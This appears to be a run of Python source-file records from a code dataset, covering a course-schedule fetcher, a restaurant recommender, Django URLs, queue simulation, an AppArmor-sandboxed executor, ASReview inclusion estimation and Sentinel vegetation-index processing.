'MATH',\n help = 'department abbreviation, e.g. MATH')\n parser.add_option('-t', '--term', dest = 'term_id', default = '2232',\n help = 'term id, e.g. 2232')\n parser.add_option('-p', '--number-of-pages', type = 'int', dest = 'number_of_pages', default = 10,\n help = 'number of pages, e.g. 10 (default 10)')\n parser.add_option('-s', '--page-size', type = 'int', dest = 'page_size', default = 100,\n help = 'page number, e.g. 
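# get_sortkey above turns course numbers like "C123AB" into fixed-width
# strings (regex split, then zero- and space-padding) so that a plain string
# sort orders them numerically. The padding trick on its own, using the same
# regex as the script:
import re

def sort_key(course_num):
    m = re.match(r"(^\D?)(\d+)(\D*)$", course_num)
    prefix, digits, suffix = m.group(1), m.group(2), m.group(3)
    return digits.rjust(3, "0") + suffix.ljust(2, " ") + prefix.rjust(1, " ")

print(sorted(["110A", "C9", "54"], key=sort_key))   # ['C9', '54', '110A'], i.e. 9 < 54 < 110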
100 (default maximum 100)')\n parser.add_option('-e', '--exclude', dest = 'exclude', default = 'IND,COL',\n help = 'comma separated section types to be excluded from search results, default \"IND,COL\"')\n parser.add_option('-o', '--output', dest = 'output', default = 'sections.json',\n help = 'name of output file (in json format)')\n (options, args) = parser.parse_args()\n # get arguments\n dept = options.dept\n term_id = options.term_id\n number_of_pages = options.number_of_pages\n page_size = options.page_size\n exclude = options.exclude\n output = options.output\n # get matching sections\n sections = get_all_sections(dept, term_id, number_of_pages, page_size, exclude)\n if sections and len(sections) > 0:\n print('{} class(es) found (see output in {})'.format(len(sections), output))\n with open(output, 'w') as f:\n json.dump(sections, f, sort_keys = True, indent = 2)\n else:\n print('no classes found (no output)')\n","sub_path":"get_schedule.py","file_name":"get_schedule.py","file_ext":"py","file_size_in_byte":8156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"636665173","text":"# page1 & a little page2\n'''\n博文要注意的地方:可以control F,打自己的名字來查\n前端要注意的地方:可以control F,打「前端」來查\n'''\n\nimport csv\n\ndef choose_style_sorted(choose_style): # 為了演算法而讓每個類型有個分數\n list_style = choose_style.split(',')\n list_sequence_point = []\n list_tmp = []\n count = 99\n for style in list_style:\n list_tmp = []\n list_tmp.append(style)\n list_tmp.append(count)\n count -= 1\n list_sequence_point.append(list_tmp)\n\n return list_sequence_point # [[韓式, 99],[日式, 98],.....]\n\ndef recommendation(restaurant_dict):\n preference = input() # 方案ㄧ排序還是方案二排序,這邊a是方案一(星數優先),b是方案二(類型優先)\n if preference == 'planA':\n recommendation_list = sorted(restaurant_dict.items(), key = lambda x: (x[1][3], x[1][4]), reverse = True)\n else:\n recommendation_list = sorted(restaurant_dict.items(), key = lambda x: (x[1][4], x[1][3]), reverse = True)\n\n return recommendation_list\n\n\nclass Restaurant:\n def __init__ (self, name, meal, locate, style, day, name2open, star):\n self.name = name # 餐廳名稱\n self.meal = meal # 早中晚宵\n self.locate = locate # 地點\n self.style = style # 風格(Ex.日式)\n # 博文:新加了兩個\n self.day = day # 輸入之日期\n self.name2open = name2open # 日期對應開放時間的dictionary\n self.star = star\n \n def put_name(self): # call餐廳名稱\n return self.name\n\n def check_meal(self): # 所選時段餐廳有沒有開的布林\n meallist = self.meal.split(', ') # 預設為字串,前端用list設定選擇時段的話:可刪!!\n cnt = 0\n for meal in meallist:\n cnt += 1\n if meal in choose_meal:\n return True # 選擇的任一時段餐廳有開的話即回傳True\n break\n if cnt == len(meallist):\n return False\n\n def check_locate(self): # 選擇地點並讓其回傳布林\n if self.locate in choose_locate:\n return True\n else:\n return False\n \n def check_day(self): # 回傳選擇的日期有沒有開的布林\n cnt = 0\n weeklist = ['MON','TUE','WED','THU','FRI','SAT','SUN']\n if self.name2open[self.name][weeklist.index(self.day)]== '':\n return False\n else:\n return True\n\n def check_style(self): # 選擇風格並回傳布林\n if self.style in choose_style:\n return True\n else:\n return False\n\nwith open('canteen.csv', 'r', encoding='utf-8') as f: # 讀csv檔\n # 製作各種字典(除星期),之後可能會用到\n reader = csv.reader(f)\n name2locate = dict()\n name2meal = dict()\n name2style = dict()\n name2phone = dict()\n name2address = dict()\n name2stars = dict() # 博文注意,多加了:星星的字典 在這!!\n\n # 前端注意!!請將input改成你們botton函數回傳的值\n choose_locate = input() # 目前應輸入string,要輸入list的話請回去把第16行刪掉\n choose_meal = input()\n choose_style = input()\n day = input() # 輸出的日期\n \n restaurant_dict = dict() # 
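# recommendation() above ranks restaurants by sorting dict items on a tuple
# key, so plan A compares stars before style score and plan B flips the
# priority. The tuple-key idiom in isolation, on toy data:
entries = {"A": (4.5, 98), "B": (4.5, 99), "C": (3.0, 99)}   # name -> (stars, style score)
plan_a = sorted(entries.items(), key=lambda kv: (kv[1][0], kv[1][1]), reverse=True)
plan_b = sorted(entries.items(), key=lambda kv: (kv[1][1], kv[1][0]), reverse=True)
print([name for name, _ in plan_a])   # ['B', 'A', 'C']: ties on stars broken by score
print([name for name, _ in plan_b])   # ['B', 'C', 'A']: score first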
點好後輸出的清單在這!!(博文、前端)\n \n name2open = dict() # 博文、振安:跑check_day的dictionary\n for row in reader: # 跑csv檔的每一行\n row.pop(0)\n # print(row)\n name2locate[row[0]] = row[1]\n name2meal[row[0]] = row[2]\n name2style[row[0]] = row[3]\n name2phone[row[0]] = row[4]\n name2address[row[0]] = row[5]\n name2stars[row[0]] = row[6]\n name2open[row[0]] = [row[8],row[10],row[12],row[14],row[16],row[18],row[20]] # 博文、振安:跑check_day的dictionary\n \n # 要class所需要的值\n name = row[0]\n locate = row[1]\n meal = row[2]\n style = row[3]\n star = row[6]\n res = Restaurant(name, meal, locate, style, day, name2open, star) # 開始使用class Restaurant\n # print(res.check_locate())\n # print(res.check_meal())\n # print(res.check_style())\n # print(res.check_day())\n \n # 用布林篩選輸出的清單\n if res.check_locate() == True:\n if res.check_meal() == True:\n if res.check_day() == True:\n if res.check_style() == True:\n for style_ in choose_style_sorted(choose_style):\n if res.style in style_:\n restaurant_dict[res.name] = [res.locate, res.meal, res.style, res.star, style_[1]] \n\nprint(recommendation(restaurant_dict))\n\n \n\n","sub_path":"p2back.py","file_name":"p2back.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"153541749","text":"from django.urls import path,include\n\nfrom .views import index,search\nfrom brands.urls import urlpatterns as brand_urlpatterns\n\nurlpatterns = [\n\n path(\"brands/\",include(\"api.brands.urls\")),\n path(\"products/\",include(\"api.products.urls\")),\n path(\"categories/\",include(\"api.categories.urls\")),\n path(\"subcategories/\",include(\"api.subcategories.urls\")),\n path(\"search\",search,name=\"search\"),\n\n]\n\n\n\n\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"104192249","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2016 Jérémie DECOCK (http://www.jdhp.org)\n\n# See: https://docs.python.org/3/library/time.html#time.process_time\n# http://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python\n\nimport time\n\ninitial_time = time.perf_counter()\n\n#do some stuff\ntime.sleep(1)\n\nfinal_time = time.perf_counter()\n\nelapsed_time = final_time - initial_time\n\nprint(elapsed_time, \"sec\")\n","sub_path":"python/time/perf_counter.py","file_name":"perf_counter.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"249762751","text":"from src.controller import Controller\nfrom src.request import Request\nfrom src.window import Window\nfrom src.globals import *\nfrom src.statistics import *\nimport numpy as np\n\ncustomers = []\nwindows = []\n\n\ndef input_int(msg):\n return int(input(msg))\n\n\ndef input_float(msg):\n return float(input(msg))\n\n\nGlobals.window_number = input_int(\"输入窗口数量: \")\nGlobals.max_queue = input_int(\"输入最大队列长度: \")\nGlobals.max_cus = input_int(\"输入客户总数: \")\nGlobals.mean_arrive_time = input_float(\"输入平均到达时间: \")\nGlobals.mean_serve_time = input_float(\"输入平均服务时间: \")\n\ntimes = 10000\nGlobals.debug = False\n\nfor s in range(0, 1):\n sumA = 0.0\n sumB = 0.0\n sumC = 0.0\n for k in range(0, times):\n Globals.cur_time = 0\n Statistics.wait_time = 0.0\n Statistics.wait_area = 0.0\n Statistics.usage_time = 0.0\n customers = []\n windows = []\n for i in range(0, Globals.window_number):\n # 创建窗口\n 
windows.append(Window(id=i))\n\n        time = 0\n        for i in range(0, Globals.max_cus):\n            # 创建所有顾客\n            start_time = time + float(np.random.poisson(Globals.mean_arrive_time * 10)) / 10\n            time = start_time\n            # start_time = float(np.random.exponential(Globals.mean_arrive_time))\n            # duration = -Globals.mean_serve_time * np.log(float(np.random.randint(1, 11) / 10))\n            duration = float(np.random.exponential(Globals.mean_serve_time))\n            customers.append(Request(arrive_time=start_time, duration=duration))\n\n        if Globals.debug:\n            print(\"准备工作完毕\")\n            print(\"已经创建%d个窗口\" % len(windows))\n            print(\"已经创建%d个顾客\" % len(customers))\n            for i in customers:\n                print(\" %d-客户:到达时间%f:服务时间%f\" % (i.get_id(), i.get_arrive_time(), i.get_duration()))\n\n        # 创建控制器\n        controller = Controller(outdoors=customers, windows=windows)\n        controller.run()\n        a = Statistics.wait_time / Globals.max_cus\n        b = Statistics.wait_area / Globals.window_number / Globals.cur_time\n        c = Statistics.usage_time * 100 / Globals.cur_time / Globals.window_number\n        print(\"%f-第%d遍模拟完成\\n\" % (Globals.cur_time, k))\n        sumA += a\n        sumB += b\n        sumC += c\n\n    print(\"平均等待时间=%f,队列平均顾客数=%f,服务器利用率=%d%%\" % (sumA / times, sumB / times, sumC / times))\nexit(0)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"641756650","text":"import subprocess\nfrom apparmor import AppArmorSecProfile, FileSystemRestriction\nfrom utils import copy_files, get_temp_dir\nimport os\nimport time\n\n\nclass SafeExecutor:\n    def __init__(self, executable_path: str, read_only_access: list = None, write_exec_access: list = None):\n        self._executable = executable_path\n        self._read_only_access = read_only_access or []\n        self._write_exec_access = write_exec_access or []\n        self._temp_dir = get_temp_dir()\n        self._apparmor_profile = AppArmorSecProfile(self._executable)\n\n    def configure(self):\n        for path in self._read_only_access:\n            self._apparmor_profile.add_fs_restriction(FileSystemRestriction(path, \"r\", True))\n        for path in self._write_exec_access:\n            # Dir itself should not have write permissions\n            self._apparmor_profile.add_fs_restriction(FileSystemRestriction(path, \"rix\", False))\n            self._apparmor_profile.add_fs_restriction(FileSystemRestriction(path, \"wrix\", False))\n        self._apparmor_profile.write_profile_and_update_app_armor()\n\n    def safe_execute(self, files: list = None, new_files: list = None, argv: list = None, stdin: str = None,\n                     timeout: int = 60):\n        \"\"\"\n        Run the configured executable (e.g. \"/sbin/python\") inside the sandbox.\n        :param files: List of files to be copied to working directory.\n        :param new_files: List of tuples (name, bytes) of files to be created.\n        :param argv: List of args to be passed to the executable. 
Usually a name of a file from 'files' or 'new_files'.\n :param stdin: Input (str) to be passed to the created process\n :param timeout: Timeout which the proccess will get terminated after in SECONDS.\n :return: (return_code, stdout, stderr)\n \"\"\"\n files = files or []\n new_files = new_files or []\n argv = argv or []\n\n copy_files(files, self._temp_dir)\n for file_name, content in new_files:\n with open(os.path.join(self._temp_dir, file_name), \"wb\") as f:\n f.write(content)\n\n command_line = [self._executable]\n command_line.extend(argv)\n if stdin:\n stdin = stdin.encode('utf-8')\n\n process = subprocess.Popen(\n command_line, cwd=self._temp_dir,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n )\n HungProcessKiller(process, timeout).start()\n\n stdout, stderr = process.communicate(stdin)\n return process.returncode, stdout, stderr\n\n\nclass HungProcessKiller:\n def __init__(self, process: subprocess.Popen, timeout: int):\n self._process = process\n self._timeout = timeout\n\n def start(self):\n timeout_start = time.time()\n while time.time() < timeout_start + self._timeout:\n if self._process.poll() is not None:\n # Process Has finished execution\n return\n time.sleep(0.5)\n\n if self._process.poll() is None:\n self._process.kill()","sub_path":"executer.py","file_name":"executer.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"531572033","text":"import json\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.optimize import minimize\n\nfrom asreview import ASReviewData\nfrom asreview.analysis import Analysis\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.models import get_model\nfrom asreview.balance_strategies import get_balance_model\nfrom asreview.feature_extraction import get_feature_model\nfrom asreview.state import open_state\n\nfrom asreviewcontrib.simulation.exponential_tail import ExpTailNorm\nfrom argparse import ArgumentParser\nfrom asreviewcontrib.simulation.download import optimize_distribution\n\n\nclass ErrorEntryPoint(BaseEntryPoint):\n description = \"Estimate the number of remaining inclusions.\"\n\n def __init__(self):\n super(ErrorEntryPoint, self).__init__()\n from asreviewcontrib.simulation.__init__ import __version__\n from asreviewcontrib.simulation.__init__ import __extension_name__\n\n self.version = __version__\n self.extension_name = __extension_name__\n\n def execute(self, argv):\n\n parser = _parse_args()\n arg_dict = vars(parser.parse_args(argv))\n\n state_fp = arg_dict[\"state_path\"]\n data_fp = arg_dict[\"data_path\"]\n output = arg_dict[\"output\"]\n\n optimization_fp = arg_dict[\"optimization_path\"]\n if optimization_fp is None:\n optimization_fp = Path(\"output\", \"optimization.json\")\n\n data_dir = Path(arg_dict[\"data_path\"]).parent\n cache_fp = arg_dict[\"cache_path\"]\n opt_results = get_opt_results(optimization_fp, data_dir, cache_fp)\n error_data = self.error_estimate(state_fp, data_fp, opt_results)\n if output is None:\n self.plot_results(error_data)\n else:\n with open(output, \"w\") as f:\n json.dump(error_data, f)\n\n def error_estimate(self, state_fp, data_fp, opt_results):\n\n as_data = ASReviewData.from_file(data_fp)\n\n labels = as_data.labels\n inclusion_est = []\n prob_finished = []\n cur_included = []\n perc_reviewed = []\n with open_state(state_fp) as state:\n settings = state.settings\n feature_model = 
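# HungProcessKiller above enforces the limit by polling and killing in the
# calling thread, which also means communicate() only starts after the watch
# loop returns. Since Python 3.3 the standard library can apply the same
# limit directly and kill the child for you; a sketch (the command line is
# illustrative):
import subprocess

try:
    result = subprocess.run(["sleep", "5"], capture_output=True, timeout=1)
except subprocess.TimeoutExpired:
    print("process exceeded the time limit")   # run() kills the child, then re-raises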
get_feature_model(\n settings.feature_extraction,\n **settings.feature_param)\n\n X = feature_model.fit_transform(\n as_data.texts, as_data.headings, as_data.bodies,\n as_data.keywords\n )\n n_queries = state.n_queries()\n model = get_model(settings.model, **settings.model_param)\n balance_model = get_balance_model(settings.balance_strategy,\n **settings.balance_param)\n\n n_total_inclusions = len(np.where(labels == 1)[0])\n for query_i in range(n_queries):\n try:\n train_idx = state.get(\"train_idx\", query_i=query_i)\n pool_idx = state.get(\"pool_idx\", query_i=query_i)\n except KeyError:\n continue\n n_inc, p_all = estimate_inclusions(\n train_idx, pool_idx, X, labels,\n opt_results, model, balance_model)\n# print(n_inc, np.sum(labels[train_idx]), np.sum(labels), p_all)\n inclusion_est.append(int(n_inc))\n prob_finished.append(p_all)\n cur_included.append(int(np.sum(labels[train_idx])))\n perc_reviewed.append(100*len(train_idx)/len(labels))\n\n error_data = {\n \"inclusion_est\": inclusion_est,\n \"prob_finished\": prob_finished,\n \"cur_included\": cur_included,\n \"perc_reviewed\": perc_reviewed,\n \"n_total_inclusions\": n_total_inclusions\n }\n return error_data\n\n def plot_results(self, error_data):\n perc_reviewed = error_data[\"perc_reviewed\"]\n inclusions_est = error_data[\"inclusion_est\"]\n prob_finished = error_data[\"prob_finished\"]\n cur_included = error_data[\"cur_included\"]\n n_total_inclusions = error_data[\"n_total_inclusions\"]\n\n plt.xlabel(\"% reviewed\")\n plt.ylabel(\"Number of inclusions\")\n plt.plot(perc_reviewed, inclusions_est, label=\"estimate\")\n plt.plot(perc_reviewed, cur_included, label=\"found\")\n plt.legend(loc=\"lower right\")\n plt.show()\n\n plt.xlabel(\"% reviewed\")\n plt.plot(perc_reviewed, prob_finished, label=\"Estimate @100%\")\n plt.plot(perc_reviewed, np.array(cur_included)/n_total_inclusions,\n label=\"Fraction of inclusions found\")\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\ndef _parse_args():\n parser = ArgumentParser(prog=\"asreview error\")\n\n parser.add_argument(\n \"state_path\",\n type=str,\n help=\"Path to state/log file.\"\n )\n parser.add_argument(\n \"data_path\",\n type=str,\n help=\"Path to data file corresponding to the state file.\"\n )\n parser.add_argument(\n \"--cache_path\",\n type=str,\n default=None,\n help=\"Path to result cache.\"\n )\n parser.add_argument(\n \"--data_dir\",\n type=str,\n default=\"data\",\n help=\"Directory to store the datasets for optimization.\"\n )\n parser.add_argument(\n \"--optimization_path\",\n type=str,\n default=None,\n help=\"Path to optimization file with optimal parameter(s) over \"\n \"multiple datasets.\"\n )\n parser.add_argument(\n \"-o\", \"--output\",\n type=str,\n default=None,\n help=\"Path to storing the results of the error estimation.\"\n \" If not supplied, plot the results instead.\")\n return parser\n\n\ndef get_opt_results(optimization_fp, data_dir, cache_fp):\n optimization_fp = Path(optimization_fp)\n\n if not optimization_fp.is_file():\n print(\"Optimization path does not exist yet, computing optimum.\")\n if len(str(optimization_fp.parent)):\n os.makedirs(optimization_fp.parent, exist_ok=True)\n if cache_fp is None:\n cache_fp = Path(\"output\", \"cache.pkl\")\n if len(str(cache_fp.parent)):\n os.makedirs(cache_fp.parent, exist_ok=True)\n optimize_distribution(cache_fp, optimization_fp, data_dir=data_dir)\n\n with open(optimization_fp, \"r\") as f:\n opt_results = json.load(f)\n return opt_results\n\n\ndef discrete_norm_dist(dist, train_percentage, 
bins):\n norm_cdf = dist.cdf(bins)\n norm_pdf = train_percentage*(norm_cdf[1:]-norm_cdf[:-1])\n norm_hist = norm_pdf/norm_pdf.sum()\n return norm_hist/(bins[1]-bins[0])\n\n\ndef percentage_found(norm_opt_cum_df, train_percentage, bins, mu, sigma):\n normalized_bins = (bins-mu)/sigma\n x_cum = norm_opt_cum_df[0]\n y_cum = norm_opt_cum_df[1]\n d_cum = y_cum[1]-y_cum[0]\n\n prob_found = 0\n for i_bin in range(len(train_percentage)):\n bin_start = normalized_bins[i_bin]\n bin_end = normalized_bins[i_bin+1]\n\n i_cum_start = np.searchsorted(x_cum, bin_start)\n i_cum_end = np.searchsorted(x_cum, bin_end)\n\n if i_cum_start == len(x_cum):\n continue\n\n y_start = y_cum[i_cum_start] - d_cum\n if i_cum_end == len(x_cum):\n y_end = 1\n else:\n y_end = y_cum[i_cum_end] - d_cum\n\n prob = y_end-y_start\n prob_found += prob*train_percentage[i_bin]\n\n return prob_found\n\n\ndef prob_all_found(min_df, df_pool, mu, sigma):\n df_max = np.max(df_pool)\n df_max_norm = (df_max-mu)/sigma\n\n x_min_df = min_df[0]\n y_min_df = min_df[1]\n\n i_min_df = np.searchsorted(x_min_df, df_max_norm)\n\n if i_min_df == 0:\n return 1.0\n else:\n return 1-y_min_df[i_min_df - 1]\n\n\ndef log_likelihood(train_dist, expected_dist):\n likelihood = 0\n for i_bin in range(len(expected_dist)):\n if train_dist[i_bin]:\n likelihood += train_dist[i_bin] * np.log(expected_dist[i_bin])\n return -likelihood\n\n\ndef corrected_proba(X, y, model, balance_model, train_one_idx, train_zero_idx,\n n_sample=10):\n cor_proba = []\n for _ in range(n_sample):\n if len(train_one_idx) == 1:\n new_train_idx = np.append(train_one_idx, train_zero_idx)\n X_train, y_train = balance_model.sample(X, y, new_train_idx, {})\n model.fit(X_train, y_train)\n correct_proba = model.predict_proba(X[train_one_idx])[0, 1]\n cor_proba.append(correct_proba)\n continue\n\n for i_rel_train in range(len(train_one_idx)):\n new_train_idx = np.append(np.delete(train_one_idx, i_rel_train),\n train_zero_idx)\n X_train, y_train = balance_model.sample(X, y, new_train_idx, {})\n model.fit(X_train, y_train)\n correct_proba = model.predict_proba(X[train_one_idx[i_rel_train]])[0, 1]\n cor_proba.append(correct_proba)\n\n return np.array(cor_proba)\n\n\ndef estimate_inclusions(train_idx, pool_idx, X, y, opt_results, model,\n balance_model):\n\n X_train, y_train = balance_model.sample(X, y, train_idx, {})\n\n model.fit(X_train, y_train)\n proba = model.predict_proba(X)[:, 1]\n df_all_corrected = -np.log(1/proba-1)\n\n train_one_idx = train_idx[np.where(y[train_idx] == 1)[0]]\n train_zero_idx = train_idx[np.where(y[train_idx] == 0)[0]]\n\n correct_one_proba = corrected_proba(X, y, model, balance_model,\n train_one_idx,\n train_zero_idx)\n\n df_one_corrected = -np.log(1/correct_one_proba-1)\n df_train_corrected = df_all_corrected[train_idx]\n df_train_zero = df_all_corrected[train_zero_idx]\n df_pool = df_all_corrected[pool_idx]\n\n df_all = np.concatenate((df_all_corrected, df_one_corrected))\n h_min = np.min(df_all)\n h_max = np.max(df_all)\n h_range = (h_min, h_max)\n n_bins = 40\n\n hist, bin_edges = np.histogram(df_one_corrected, bins=n_bins,\n range=h_range, density=True)\n hist_all, _ = np.histogram(df_all_corrected, bins=n_bins, range=h_range,\n density=False)\n hist_pool, _ = np.histogram(df_pool, bins=n_bins, range=h_range,\n density=False)\n hist_train_zero, _ = np.histogram(df_train_zero, bins=n_bins, range=h_range,\n density=False)\n hist_train_one, _ = np.histogram(df_one_corrected, bins=n_bins, range=h_range,\n density=False)\n hist_train, _ = 
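# The log_likelihood helper above is handed to scipy.optimize.minimize with
# box bounds a few lines below. The same mechanic on a toy problem, recovering
# a normal's mu and sigma from samples by minimizing the negative
# log-likelihood:
import numpy as np
from scipy.optimize import minimize
from scipy.stats import norm

samples = np.random.default_rng(1).normal(2.0, 0.5, size=200)

def neg_log_likelihood(params):
    mu, sigma = params
    return -np.sum(norm.logpdf(samples, loc=mu, scale=sigma))

result = minimize(neg_log_likelihood, x0=[0.0, 1.0], bounds=[(-10, 10), (1e-3, 10)])
print(result.x)   # close to (2.0, 0.5)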
np.histogram(df_train_corrected, bins=n_bins,\n range=h_range, density=False)\n\n perc_train = (hist_train_zero + hist_train_one/10 + 0.000001)/(\n hist_train_zero + hist_train_one/10 + hist_pool + 0.000001)\n\n def guess_func(x):\n dist = ExpTailNorm(*x, *opt_results[\"extra_param\"])\n corrected_dist = discrete_norm_dist(dist, perc_train, bin_edges)\n return log_likelihood(hist, corrected_dist)\n\n mu_range = h_range\n est_sigma = np.sqrt(np.var(df_one_corrected))\n sigma_range = (0.7*est_sigma, 1.3*est_sigma)\n x0 = np.array((np.average(df_one_corrected), est_sigma))\n\n minim_result = minimize(fun=guess_func, x0=x0,\n bounds=[mu_range, sigma_range])\n\n param = minim_result.x\n est_true_dist = ExpTailNorm(*param, *opt_results[\"extra_param\"])\n\n est_found_dist = discrete_norm_dist(est_true_dist, perc_train, bin_edges)\n\n perc_found = percentage_found(opt_results[\"cum_df\"], perc_train, bin_edges,\n param[0], param[1])\n\n p_all_found = prob_all_found(\n opt_results[\"min_df\"], df_pool, param[0], param[1])\n return np.sum(y[train_idx])/perc_found, p_all_found\n","sub_path":"asreviewcontrib/simulation/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":11805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"577229933","text":"#!/usr/bin/env python\n# coding: utf-8\n# パッケージのインストール&インポート gdal\n#gdalによるNDVI等の計算と出力 https://qiita.com/t-mat/items/24073d8494a7427c0ee1\n#\nimport gc\nimport math\nfrom osgeo import gdal,gdalconst\nfrom dateutil.parser import parse\nfrom osgeo import gdal_array\nfrom osgeo import osr \nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport rasterio\nfrom rasterio import plot\nfrom rasterio.plot import show\nfrom rasterio.mask import mask\nimport glob\nimport geopandas as gpd\n# matplotlibで時系列図を作成するときには以下をインポートします\nfrom pandas.plotting import register_matplotlib_converters\n# これを登録しておきます.\nregister_matplotlib_converters()\n# sklearn(scikit-learn)は機械学習関連のライブラリーです.インポートします.\nfrom sklearn import linear_model\nimport folium\nimport matplotlib.cm as cm\n# datetimeは日時データを処理する際に便利なメソッドです.インポートします.\nfrom datetime import date, datetime, timedelta\n#import datetime\nimport csv\n# 有意検定をするためにscipyのstatsというメソッドをインポートします.\nimport scipy.stats as stats\n#%precision 3\n#%matplotlib inline\n\n#area_name = 'hitoyoshi'\narea_name = 'nagahama1'\ndirect_name = '/home/twatanabe/senti/'\nfilename = \"kohoku_AOI1_clip_paddy\" # 長浜\ninput = direct_name+area_name+'/INPUT/'\noutput = direct_name+area_name+'/OUTPUT/'\nndpath = output+'IMAGE/NDVI/'\nnwpath = output+'IMAGE/NDWI/'\nnspath = output+'IMAGE/NDSI/'\ngspath = output+'IMAGE/GSI/'\nshpath = input+'SHP/'\noutpath = output+'RESULT/'\ndirect = input+'MET/'\n# inputデータ\nin_file = area_name+\"_data1.csv\" # 元の気象データ\ninput_shp = shpath + filename+'.shp' # 切り出し用のshpファイル\ndata_path = input+'/DATA/' # オリジナルのセンチネルデータ\n# outputデータ\nstrFile = outpath+filename+\"_time_series_img_all.jpg\"\nmerge_file = outpath+filename+\"_merge.csv\"\ncorr_file = outpath+filename+\"_corr.csv\"\ndesc_file = outpath+filename+\"_desc.csv\"\nprecFile = outpath+filename+\"_time_series_prec_img.jpg\"\nprecviFile = outpath+filename+\"_time_series_prec_vi_img.jpg\"\nindexFile = outpath+filename+\"_time_series_index_img.jpg\"\nplotFile = outpath+filename+\"_time_series_plot_img.jpg\"\n\n#----------------------------フォルダが存在しない場合に作成する。\ndef makepath(path):\n if not os.path.exists(path):\n os.makedirs(path) 
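# A small aside on makepath above: since Python 3.2, os.makedirs can do the
# existence check and the creation in one call, which also avoids the race
# between checking and creating:
#     os.makedirs(path, exist_ok=True)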
\n#----------------------------NDVI\n# Define a function to calculate NDVI using band arrays for red, NIR bands\ndef calNDVI(r_band,nir_band):\n nir = nir_band.astype(np.float32)\n red = r_band.astype(np.float32)\n ndvi=np.where(\n (nir+red)==0.,\n 0,(nir-red)/(nir+red))\n return ndvi\n#----------------------------NDWI 水域\ndef calNDWI(lir_band,r_band):\n lir = lir_band.astype(np.float32)\n red = r_band.astype(np.float32)\n ndwi=np.where(\n (lir+red)==0., \n 0,(red-lir)/(red+lir))\n return ndwi\n#----------------------------NDSI\ndef calNDSI(lir_band,nir_band):\n lir = lir_band.astype(np.float32)\n nir = nir_band.astype(np.float32)\n ndsi=np.where(\n (lir+nir)==0., \n 0,(lir-nir)/(lir+nir))\n return ndsi\n#----------------------------GSI\ndef calGSI(b_band,g_band,r_band):\n b = b_band.astype(np.float32)\n g = g_band.astype(np.float32)\n r = r_band.astype(np.float32)\n gsi=np.where(\n (b+g+r)==0., \n 0,(r-b)/(b+g+r))\n return gsi\n#---------------------------作成データ保存\ndef outputGeotifSingle(src,epgs,band1,path):\n tfw=src.GetGeoTransform()\n dtype = gdal.GDT_Float32\n band = 1\n width=src.RasterXSize\n height=src.RasterYSize\n output = gdal.GetDriverByName('GTiff').Create(path, width, height, band, dtype)\n output.SetGeoTransform(tfw)\n crs = osr.SpatialReference()\n crs.ImportFromEPSG(epgs)\n output.SetProjection(crs.ExportToWkt())\n output.GetRasterBand(1).WriteArray(band1)\n output.FlushCache()\n output=None\n#-----------------------タイトル、平均リスト合計\ndef dataInfo(data_mean_list, data):\n data_mean = np.nanmean(data)\n data_mean_list = np.append(data_mean_list,data_mean)\n return data_mean_list, data_mean \n\n#-----------------------アメダスデータの読み込み\n# 気象庁アメダスの気温の時系列データを読み込んで,\n# DataFrameに割り当てる関数\n # ここがポイント!\n # pandasのread_csvというメソッドでcsvファイルを読み込みます.\n # 引数として,\n # [0]入力ファイル名\n # [1]エンコーディング\n # [2]読み飛ばす行数,\n # [3]column名\n # [4]datetime型で読み込むcolumn名\n # [5]indexとするcolumn名\n # を与える\ndef readamedas(filename,skipline):\n amedas = pd.read_csv(\n filename, \n encoding=\"Shift_JIS\", \n skiprows=skipline, \n# header=None, \n names=[\"Date\",\"Prec\",\"dummy1\",\"dummy2\"],\n index_col='Date',\n# parse_dates={'datetime':['date']}, \n parse_dates=True, \n )\n return amedas\n#def 5.############################################\n# 2つの時系列データから時系列図を作成する関数\ndef timeseries(df,date1,name1,name2,filename):\n # dfのインデックス(時間)をXとする\n# X=df.index\n X=df.loc[:,[date1]].values\n print(df.loc[:,[date1]].values)\n # dfのname1列を指定してデータを取り出し,numpy配列で値をY1に与える.\n Y1=df.loc[:,[name1]].values\n # dfのname1列を指定してデータを取り出し,numpy配列で値をY2に与える.\n Y2=df.loc[:,[name2]].values\n # 時系列図の大きさを指定\n plt.figure(figsize=(20, 10))\n # 1つ目(name1)のグラフを1行1列の1つ目に\n ax1=plt.subplot(1,1,1)\n # 2つ目(name2)のグラフのx軸を共有する\n ax2=ax1.twinx()\n # 1つ目(name1)の時系列 \n ax1.plot(X,Y1,color='blue',label=name1)\n # 2つ目(name2)の時系列 \n ax2.plot(X,Y2,color='red',label=name2)\n # グラフのタイトル\n ax1.set_title(\"Timeseries:\"+name1+\" and \"+name2)\n # x軸のラベル\n ax1.set_xlabel('Time')\n # y軸(左側の第1軸)のラベル\n ax1.set_ylabel('Index')\n # y軸(右側の第2軸)のラベル\n ax2.set_ylabel('Amount of Precipitation [mm/hr]')\n # 1つ目(name1)の凡例(左上に置く) \n ax1.legend(loc='upper left')\n # 2つ目(name1)の凡例(右上に置く)\n ax2.legend(loc='upper right')\n # 保存するファイル名\n plt.savefig(filename)\n # 図を閉じる\n plt.close()\n 